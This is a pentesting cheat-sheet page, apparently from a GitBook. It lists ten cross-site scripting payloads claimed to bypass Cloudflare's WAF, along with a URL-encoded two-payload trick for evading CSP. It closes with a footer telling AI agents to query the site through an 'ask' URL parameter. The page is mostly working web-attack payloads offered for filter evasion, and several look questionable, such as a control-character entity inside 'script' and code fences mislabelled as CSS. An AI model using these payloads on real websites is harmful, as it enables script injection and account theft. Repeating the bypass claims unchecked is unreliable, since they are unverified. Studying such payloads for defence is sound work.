# Cloudflare's XSS protection

Cloudflare provides robust security measures to protect websites from various attacks, including Cross-Site Scripting (XSS). However, attackers may still find ways to bypass these protections. Here are 10 examples of XSS payloads that could potentially bypass Cloudflare's XSS protection:

1. Unicode encoding:

```css
<scr&#x9Cipt>alert(1)</scr&#x9Cipt>
```

2. Using HTML entities:

```css
<img src=x onerror=&#x61lert&#x28&#x27123&#x27&#x29>
```

3. Using JavaScript URL encoding:

```css
<script src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x68&#x74&#x74&#x70&#x3A&#x2F&#x2F&#x77&#x77&#x77&#x2E&#x61&#x6C&#x65&#x72&#x74&#x2E&#x63&#x6F&#x6D&#x2F&#x73&#x63&#x72&#x69&#x70&#x74&#x27&#x29>
```

4. Using JavaScript encoding:

```css
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
```

5. Using CSS expressions:

```css
<style>@import'\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003A\u0061\u006C\u0065\u0072\u0074\u0028\u0027\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0077\u0077\u0077\u002E\u0061\u006C\u0065\u0072\u0074\u002E\u0063\u006F\u006D\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u0027\u0029';</style>
```

6. Using JavaScript comments:

```css
<script>/*-/**/alert(1)/*-/*-->/*</script>
```

7. Using event handlers:

```css
<body onload=alert(1)>
```

8. Using JavaScript encoding with comments:

```css
<script>eval(String.fromCharCode(/*-*/97/*-*/,/*-*/108/*-*/,/*-*/101/*-*/,/*-*/114/*-*/,/*-*/116/*-*/,/*-*/40/*-*/,/*-*/49/*-*/,/*-*/41/*-*/))</script>
```

9. Using JavaScript encoding with whitespace:

```css
<script>eval(String.fromCharCode( 97, 108, 101, 114, 116, 40, 49, 41 ))</script>
```

10. Using JavaScript encoding with different encoding schemes:

```css
<script>eval(String.fromCharCode(0x61,0x6C,0x65,0x72,0x74,0x28,0x31,0x29))</script>
```

If CSP policies blocked you while trying XSS, be sure to try two separate XSS payloads (encoded) one after another, this may help you bypass the file.&#x20;

1- `%3C/script%20%3E`&#x20;

2- `mitsecXSS%22%3E%3Cinput%20%00%20onControl%20hello%20oninput=confirm(1)%20x%3E`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://akuma-s.gitbook.io/akuma/pentesting-web/vulnerabilities-payloads/xss-cheat-sheet/cloudflares-xss-protection.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.